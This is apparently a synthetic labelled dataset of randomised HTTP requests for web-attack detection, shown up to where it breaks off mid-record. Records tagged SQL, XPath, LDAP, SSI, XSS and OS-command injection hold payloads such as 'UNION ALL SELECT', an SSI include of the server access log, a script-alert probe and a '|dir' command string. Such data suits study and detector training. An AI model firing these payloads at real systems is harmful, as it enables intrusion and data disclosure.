GET /rrCaAjtSZ4H362V/Aoek9/ee7_/hn4LvH3/2jkq0dropXFZzpasswdGNYd/ak@k0131/zhbK5@1SRq/i9r1z/tIGeLY.bin?j0aoa9oreplaceftp-x=rbahirp5siheeypSh&UR5mE=3&65ekdal77tln=30%29%28%26%28objectClass%3Ddpd%29%28%7C%28sn++++%3D++aeg%29%28cn%3Djs+++J*%29%29&3niqafchrexdn=TeenirnuN&ae=4 HTTP/1.0
Host: 0.75.191.97
Connection: close
Accept: audio/*;q=0.5, text/*
Accept-Charset: iso-8859-3;q=0.2, iso-8859-5;q=0.5, koi8
Accept-Encoding: gzip;q=0.7, identity;q=0.5, identity, gzip;q=0.2, gzip;q=0.2
Accept-Language: y-sstd, yybi-dsnlvsmy;q=0.1
Cache-Control: max-age=98
Client-ip: 176.132.89.96
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Wed, 15 Apr 09 09:49:37 GMT
ETag: W/"Zl1tLfUymxvB3V8"
Expect: 100-continue
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 14
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest username="e7ozca"
Range: 2-,-247703
Referer: http://t28A.com/OblXetzj/2iexty/ltAp/trse.mpeg
TE: deflate
Trailer: Date
User-Agent: rp6w6KJ38C http://www.anrZR.it
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: 3.8 41.115.36.79:3
Transfer-Encoding: deflate
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38987
Start - Id: 41460
class: SqlInjection
POST /inu5r7topud3t/iirdmeh2ekgrnsrhe6tl/liVwdal/xDOIQNYC0v/F46VF3qlibyelTEy/uNyedsot5e.mspx? HTTP/1.0
Content-Length: 209
Content-Language: geeueg
Content-Encoding: identity
Content-Location: /m5erdtSh/dkopVf2e/isherp1/tso2.jpg
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Feb 04 02:31:15 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: www.irnyrdtstv.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, ks_c_5601-1987
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 165.216.117.58
Cookie: Udivx9lPEFyR=1377;2gtbaraegactl=74;d2onsd1=iesodf9aeI:~3iood;oathqe=wqTfS;dsorsaeataye2e=4
Cookie2: $Version="83"
Date: Wed, 04 Oct 06 14:40:51 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Thu, 04 Aug 05 03:44:54 UTC
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: *
If-Range: *
Max-Forwards: 5178
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: /yea3noe/uwwd/nt2eeus.nsf
TE: trailers,deflate;q=0.4,trailers
Trailer: If-None-Match
User-Agent: tecjrue-i http://www.aigWdr.biz
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: gzip
Upgrade: ilbd/6.7, 6Adhh/9.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NcuhcnhodFxl=tUO9t&b2eHnmMcao='    ) UNION   ALL     SELECT   7665     FROM 5gdrPs2ziR    WHERE  ( ''=   '&8foysHgaanneuW=nn3lrcbnrmOid3&aiM2_TG=s(processing-instructionmo&g9nyseiotly=tznL )s

End - Id: 41460
Start - Id: 35638
class: XPathInjection
GET /if/barhamte2heCn/acAtEeeTd0afasC/r8/hGbdOUHwfucntB2s/ogSveOf8dVs/F8ioiO3CyllugO9nce/maqxb@Fv6aiV2OPxZzpf/ld.htm?qahuti=n5+zsi&WwCt=7001761&QUi1L9d=235679&ej=90867+++++or++1%3C+++++ns6em6%2FsCv%2Fh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D+++++or++++67%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&xWrBs_sN=42%26a HTTP/1.0
Host: 55.123.122.186:80
Connection: close
Accept: image/gif, audio/*;q=0.9, audio/x-wav
Accept-Charset: iso-8859-9, big5;q=0.0, euc-tw;q=0.4
Accept-Encoding: deflate;q=0.8, gzip, compress, identity;q=0.3, compress
Accept-Language: *;q=0.8
Cache-Control: bmrdbrp=miike
Client-ip: 69.177.219.175
Cookie: ybetweenf_Nsps=anpdtiLsaee;5rcnrsslioa=3185;a3eeavetlee=stnki
Cookie2: $Version="207"
Date: Thu, 11 Nov 04 20:39:52 UTC
ETag: W/"5joi@sl1CHdkS19bN3"
Expect: 100-continue
From: nenfl@ioddyed.it
If-Modified-Since: Sun, 11 Dec 05 07:30:52 GMT
If-Unmodified-Since: Thu, 04 Jan 07 17:01:45 UTC
If-Match: "@mJE_Mt4cyjZjSq"
If-None-Match: "eqCypgzeag9x73Ip"
If-Range: Wed, 03 Feb 10 04:29:02 GMT
Max-Forwards: 1
MIME-Version: 2.3
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM RG9kY0lPanM3aGlpd1M2dGFvZ2kxaDRrbm0wdGVyY3Noc3Bobm56YmQ=
Range: -38,162-85,-031
Referer: /ap8aoe.swf
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 8.6; cb-Ec; rv:4.5.3) Gecko/26198830
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: 9.0 www.9tts.jpeg:1, FTP/6.8 22.185.49.69
Transfer-Encoding: compress
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35638
Start - Id: 35542
class: XPathInjection
PUT /i9o/sD/zD5nodeMQaNdELtvar/NAUmOWAr-oM4_W.sh? HTTP/1.0
Content-Length: 244
Content-Language: rnho,s
Content-Encoding: deflate
Content-Location: /e9ADj/iracb9r/esinapO/aa3ui/zELgu.gz
Content-MD5: c3R0cm1lZkVyRXR0aGduZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Feb 04 22:46:00 GMT
Last-Modified: Fri, 03 Sep 04 05:47:47 CET
Host: www.aeahlae.cz
Connection: eTm4si
Accept: */*;q=0.6
Accept-Charset: iso-8859-1;q=0.8, windows-1253, iso-8859-1, macintosh;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 50.148.205.107
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Mon, 18 Jan 10 16:10:04 UTC
ETag: W/"YthNYXXNEQKeFuBoXKu9"
Expect: cpeo=neIawpa;jnellsV
From: Q6fua@alfpse.net
If-Modified-Since: Tue, 28 Jul 09 05:22:13 GMT
If-Unmodified-Since: Sat, 26 Nov 05 05:11:08 UTC
If-Match: "w5zN0vj4csCx6..4"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: 9auco60=kpbthoen
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest algorithm=MD5-sess
Range: 7-26018,971548-,-1
Referer: /AieFg.html
TE: chunked
Trailer: Host
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 8.0; 3t-7r; rv:1.1.8) Gecko/00416584
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: HTTP/5.1 www.trhrj6.gif, HTTP/1.8 180.78.202.80, 0.1 www.tpzw.shtml:251
Transfer-Encoding: deflate
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6igKave=7-o@PH33&4e1h8ymEo=ks&Mlwridh8t=da' or    deede2/hd/child::node()[processing-instruction()=498]     or 'sschmj'   =   '&B9SA@mQn8D=91250&Stodxhe=9&imeineyrttahac= null &C8TdHxniaeeovta=neba2ryatBccuisgr

End - Id: 35542
Start - Id: 38799
class: LdapInjection
GET /to7sejeoh5m/dpMQXVhEUMc/4GpFoRxna88gjYj/icREcyCFJ-EBXzay9/nbP/s2D1r74N-gf-3Z/xsv6YxigLb/LSMe6@documentL/urM.cgi?KB.fO6L=40&aoamseueg4ye=qOP4-%40Do_&eetj=16&kmOko=c&YesfareErOd=es%5C%5Dupg%5Cca+Ge%25boehttps&8iayderLwhehl=replacenevaln&lswNdrEeC=hq3i4+mon&iepgeCkooAc=632wi&e5tm=%29+++%28++++%7C++++%28displayName%3Dhad*%29+%28name++%3D+had*+++%29%28++mail%3Dhad*+++%29&ooelhj=5570354 HTTP/1.1
Host: www.hwIsiodE.uk
Connection: tdqsxy
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, identity;q=0.7, deflate;q=0.1, deflate;q=0.1, identity;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Thu, 23 Aug 07 18:09:28 CET
ETag: "4UwddxC_XOgDag_nOPkb"
Expect: 100-continue
From: Nrt0ttsL@rnpbsgro.fr
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Fri, 06 Feb 04 11:18:15 GMT
If-Match: "ZzBZb2KUg_iTlkV@"
If-None-Match: "96hepxWdtqgSOw8Agg"
If-Range: Sun, 22 Feb 09 23:52:27 GMT
Max-Forwards: 7006
MIME-Version: 3.1
Pragma: hlne=hai
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: http://ne0eoer.gov/biha/cdtt/t0ieee.html
TE: deflate;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/4.9 (X11; U; Open BSD i586 9.9; 3j-VE; rv:0.1.2) Gecko/67163353
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: ezoBi/6.6 166.199.71.86
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 322 www.iehxp.jpg "lshodeasakay0kd" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38799
Start - Id: 48371
class: XPathInjection
GET /eAeOTh6ndioedasd/PaR8S/y1Sou@-oSllUfv5LC5wZ/vC/-W-execGIC/NUVV6_x6eUCZ-/hRZyYc-4UXJ@MnaRoZj/0tFqP6JZCZKDkj/au0QWqwX4os.LzIhLtVC/tZ4caZ21jBdite7g/eul3Lq@_0.htm?m1LtfngTy=st4yo%5DnisOsftp+tk&wo=+lEThdocumenth&wnaihpatfige3se=5Esa4weo&ebh=+s1eNo7yis5atb%2F%26i7&ettrus=wmz+xmlh9a%5Ds9-+nphp&qstdinFGS6=56&talesp=icftoviG&odc5Khrhoo=3&PoP1formS4KxZftptmp=tlaefnbia8&te7=hgvEengN+5n%3FfselectkD&uarpao3=151906996&a5utnwe=izYt&LEJST44ypFzO=obsoss5 HTTP/1.1
Host: www.rlzht.ch:80
Connection: onAar0
Accept: application/*, image/gif;q=0.5, audio/basic
Accept-Charset: x-mac-arabic, iso-8859-1, iso-8859-8;q=0.7
Accept-Encoding: sGa'  or    8E/h6iiq9/child::node()[processing-instruction()=3]    or    'oquen'   =   '
Accept-Language: ese-noF, aiydyi6k-iE8Grlz, dl3sUadv-t5;q=0.7, Afswa3-rbtes
Cache-Control: lf=w
Client-ip: 109.152.0.174
Cookie: nrn3eudhEDhcmkO=rOd;pySnfoa6sq=63609587
Date: Tue, 21 Oct 08 11:24:33 GMT
ETag: W/"Mmf2yatPD0NUtyuY5-g"
Expect: HetkQ=ev2xa
From: s5al6B3@ostl.it
If-Modified-Since: Fri, 29 May 09 14:02:28 CET
If-Unmodified-Since: Fri, 14 Mar 08 20:09:49 UTC
If-Match: *
If-None-Match: "W@y7bzc7DVNv2seIcO5J"
If-Range: *
Max-Forwards: 093
MIME-Version: 1.1
Pragma: tmsnhT9o='ensetty'
Proxy-Authorization: Basic bnRyaXNoOmluZW9k
Authorization: NTLM c2EyZWxnbmFvbGtsZmFrZWN1ZW1jYWVlZWVpcjBvTEFC
Range: -101,-0,2257-
Referer: /4chjm/oounLm/sc1St5/crad/Xnxva.htm
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.3 (X11; U; Open BSD i386 7.6; ot-ab; rv:8.1.4) Gecko/51685287
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 516x4086
Via: HTTP/6.5 www.syguecyb.css, FTP/6.5 132.197.45.30
Transfer-Encoding: gzip
Upgrade: bet/7.8, 8soh/6.0, iHde0s/2.8, dtO/9.5
Warning: 920 242.150.132.18 "hesjsoctncttlo" "Wed, 13 Jan 10 09:05:54 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48371
Start - Id: 40838
class: SSI
GET /eh/rLGSYuw9IfTUq0Lv.-/iosZKSrj@zKCD4/Ys9iqn6ehUrA4Swnaz/tRZGC/Uniesa/arfCf/ofei2gt6as5initaecsj.tiff?dtdadfesnUq=wlsc%3Cl6ish&eix8tde=hcwMO3x7Wm.r&srgejsntd3iem=hclike%3Dh&otm8n=0413&iqg=60915&txyincisvHhH=enaae&LINYzIVDWsS4=%3C%21--++++%23odbc++statement+%3D+++%22select++++eno%2C++++Tnin0%2C++++Ssrcm5r++from++++t3lsi7n+++++order++by+++7%2C+598%2C+++++0%22+--%3E&Vwp-T-Bscmdh=ub+aOiian&lq2sEtmssger=wykhexmlico&pn5icctus7Uqiok=we+lu+oxml&otaka3OmybntT5=ahled2dcdocumentma&PobjectexecT9Jeval4GN3access_log=Rli0pi0Dlsajemta&jUs2toeOda=jrAPe&ifEh8Trt=6i%3F HTTP/1.1
Host: 139.117.198.42
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 75.99.25.245
Cookie: uhttpsntQFON@sK=8;ScohtNa2tcr4=495574
Cookie2: $Version="353"
Date: Thu, 23 Apr 09 19:38:47 GMT
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 100-continue
From: ieoa@hH3oh2lcin.de
If-Modified-Since: Mon, 21 Jan 08 14:08:28 GMT
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: "xRhFoymkJFIDpQW"
If-None-Match: *
If-Range: Fri, 29 Feb 08 23:23:47 GMT
Max-Forwards: 5
MIME-Version: 9.0
Pragma: nr='g6hat'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: ydaor iltid=htotal
Range: 4-703669
Referer: http://www.tenBrot.be/ch0b/rrcnltee/ePIte.html
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.6 (Windows; U; WinNT 9.0; os-mo; rv:8.9.6) Gecko/72573808
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 9.1 www.syeee4.htm, HTTP/5.5 21.211.108.139, Aeo5on/8.3 213.101.214.233
Transfer-Encoding: gzip
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 409 198.101.208.57 "eean61TLsanwsEti" "Thu, 01 Apr 10 06:52:14 GMT"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40838
Start - Id: 47996
class: XSS
GET /iAWUsF.XjXBPt3/4Gpa.pfU/oagihocchobeqhU/o6.wivkbS87ESEvb.jsp?2niTwltoad=3399477995&nm=eieservicese&tAtd=r12idlz%2BEa5%3Ctbqaesea&ehx=%40t&er=cOCegEM.&Genr2wdIeEDhsf=%3Cscript+%3Ealert++%28+%22+++eue5rsa3me8tsocn.weseot%22%29%3C%2Fscript%3E HTTP/1.1
Host: www.e10eev1a1.gov:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-korean, cp-950;q=0.2, windows-1251;q=0.7, macintosh;q=0.4
Accept-Encoding: *
Accept-Language: I1-ssr
Cache-Control: only-if-cached
Client-ip: 200.176.81.45
Cookie: cweeoney=711
Cookie2: $Version="01"
Date: Thu, 23 Nov 06 10:21:53 UTC
ETag: W/"WCb03iO-YhbC5XqA"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Wed, 25 Feb 09 07:01:43 UTC
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: "Ls_CRKSN.YPAAr9X8vt"
If-Range: Sun, 14 Oct 07 02:29:04 GMT
Max-Forwards: 3
MIME-Version: 9.7
Pragma: ee2i=sh
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic SWVuN2RuOjNoeWFtZXNl
Range: 209-45720
Referer: /uIrlaem/i4iidi/ieetrhet/nirumoia.fgf
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: p0trxegaB5elmd
UA-CPU: 68000
UA-Disp: 491,839,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 480x167
Via: 0.1 www.etsedn.tiff
Transfer-Encoding: deflate
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 44433169110
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47996
Start - Id: 35751
class: XPathInjection
GET /sVjflwN4MqpBvJ/r2NqPX3QbONDR/of19dpwcCx55/nht/nOyt9/r.w-tHV58BlL_/a1_HbUp0paQ2i/Pi_ySperlnph-V2jGD/NIxp_L7RYG5q_wbetween/hOG30w.OZaV2f.gif?HTtthhu1uhsn3Il=s2u%27+++or+++++anU%2Ff%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or++%27nNu0qidm%27+%3D++%27&rdcnsd=544034409&Dra2i=221474&oemhmarIttatuo=waer4oIhrahxjo HTTP/1.1
Host: www.IhRe.st
Connection: ro3rtt
Accept: */*;q=0.9
Accept-Charset: us-ascii
Accept-Encoding: *
Accept-Language: Onxoshwr-daoemt, e-neihNwu;q=0.9, aOozg1t-ek
Cache-Control: no-transform
Client-ip: 64.250.168.166
Cookie: imh6yeYte=c2qtis\id;63xterm.vC=Se;raaAusrleltr\g;5PkSunionlibI=childsgbtq;s3At0labodtr3=aFrc7ratne;tTN=87759
Cookie2: $Version="40"
Date: Wed, 12 Jul 06 22:45:36 UTC
ETag: "Y2G28OgdZeEhliz"
Expect: 100-continue
From: nsEeee@gxtagow.be
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Fri, 22 Jun 07 21:06:34 UTC
If-Match: *
If-None-Match: "vowKaCWBAFcctSz_Cusz"
If-Range: Mon, 11 Apr 05 14:43:17 UTC
Max-Forwards: 5452
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: tofudo hibedi=hiirl9g
Range: 9-,5-44011,048-
Referer: /eaTetbf.exe
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: oTeabdeeyctsou7isIa
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.7 www.cyee.tiff:6
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35751
Start - Id: 44513
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: www.a2amuin.net
Connection: keep-alive
Accept: audio/x-wav, text/*, text/xml
Accept-Charset: gb2312;q=0.3, big5;q=0.3, euc-cn;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: sek-YhnnSeeu, b-ygttisv;q=0.2
Cache-Control: min-fresh=39545
Client-ip: 11.33.202.95
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="2"
Date: Thu, 27 Aug 09 16:55:46 CET
ETag: W/"HcdXasxzouezv38hXg"
Expect: zfHsd=neeRao
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Fri, 26 Mar 10 09:09:18 GMT
If-Unmodified-Since: Fri, 06 Jun 08 09:44:51 CET
If-Match: "RIMAZjT-CfX_MzAcxA"
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: *
Max-Forwards: 61
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 7-42
Referer: /e4c6zC/dseeleL/hnnttsms.nsf
TE: gzip;q=0.6
Trailer: Warning
User-Agent: afOir/4.5.3.4
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44513
Start - Id: 38019
class: LdapInjection
GET /nFOpA1TLozpoN/sq0L/v5SI/rcya4Sy1R1liCK7lmPN/r4/uT32_i0FHJ.gif?2nF6sDom=264519&md9esMee4trv=03127877&sPJnAIhttpmailE=921864650&dnXa3walhdazkhw=8991702&aFVinputcwseHW=drecftOcd&2Otsitenre=2939762&tmrhejetioh=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 170.210.174.49
Connection: keep-alive
Accept: audio/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: u1b6uoa-soL5, aaeep-t;q=0.9, eihiX-3;q=0.4
Cache-Control: min-fresh=943
Client-ip: 204.64.18.91
Cookie: VbGBZFL=iy09orETo
Cookie2: $Version="3"
Date: Wed, 18 Nov 09 06:39:25 CET
ETag: "zGwbkaD56y2_UjA"
Expect: 4taRX=risno5L4
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 08 Apr 10 12:26:59 GMT
If-Unmodified-Since: Sun, 31 May 09 19:13:56 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 986
MIME-Version: 8.2
Pragma: ynot=Ensd
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Basic Y2RvOGF0NG46aXN6Y2lF
Range: 28-,220237-8,8-
Referer: /9gsqta/arsote.sh
TE: trailers,chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.6 (compatible; Konqueror/8.1; Linux i386; htcijme; unrH7iuoo4)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: HTTP/7.9 86.97.207.248, 0.9 81.100.53.152, s3og/2.8 www.Ce2nre.js
Transfer-Encoding: deflate
Upgrade: obs/0.4, gbr/5.8
Warning: 871 35.130.69.56 "hdEagaRnal3ae" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 9679089566014
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38019
Start - Id: 39736
class: SSI
GET /pFm-DA3J/Htetews5aKh22h/sRdK_TJWHshC27qLO/cHwiKLi_zBEo-0.asmx?erttrOrs4fm=4330501&_RFhXmL3sami=gtnO&bifmturwhs=%3C%21--+++++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&sn2hoehLtdL=Ehlsmnt0ndiognnoR&openRyuYJ7=dWll%2Byd+ HTTP/1.0
Host: www.og6ooeenoc.fr:80
Connection: keep-alive
Accept: image/jpeg, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nhBt-S, jar-ehu
Cache-Control: min-fresh=2
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="1"
Date: Sat, 16 Jan 10 17:36:18 GMT
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: edtEiwvr@nastnEtx.it
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: "VB-CR1dEDdJkDQNi"
If-None-Match: *
If-Range: "W6mTMCkvr6JinUU1"
Max-Forwards: 5
MIME-Version: 4.8
Pragma: Cafp='tei8he'
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Ilaaw 1hcnv=r7t63
Range: -58,-7,-12255
Referer: /THjqt5Ip/enrS7Hi/d3eSnn.mdb
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: deaCa6/7.1.2.6.4
UA-CPU: Sparc
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 8.7 31.3.176.208, pdt3i5/7.2 12.54.88.254, 1.8 222.255.101.54
Transfer-Encoding: gzip
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39736
Start - Id: 49708
class: XPathInjection
GET /ljhUvWhyc/Drve8sgaesmtsx3se/oNKyFa8j1PnknB.jsp?eA1yelo=sAlezl&wU_Hjdcmd92QD=83++or++1%3C++ecteam%2Fee3%2Fgaertc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+or++860%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 68.79.140.125
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, identity, identity;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 25.213.247.107
Cookie: e5eoeZla=atzReAoEmQXD
Cookie2: $Version="241"
Date: Tue, 24 Nov 09 09:13:51 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: aap7xdn=Hphoh
From: Etbaese@jwshhAoe.net
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: *
If-None-Match: "M2o.KHXAyB@bXeNbgnSV"
If-Range: Wed, 14 Apr 10 24:42:24 UTC
Max-Forwards: 4
MIME-Version: 3.5
Pragma: r5Ec4n8a='2deld'
Proxy-Authorization: NTLM dHBtcm83aGFDT2VvdGpoeXJudHVia2lidXQwa3I4Ym5vZDJsc3ZvaXM=
Authorization: Digest opaque="3udRemTa"
Range: 0-,006-0351
Referer: http://I5wrthx.it/9m6r/N1tih.swf
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/2.1 (compatible; MSIE 8.0; Unix; sotfottfe)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Win9x
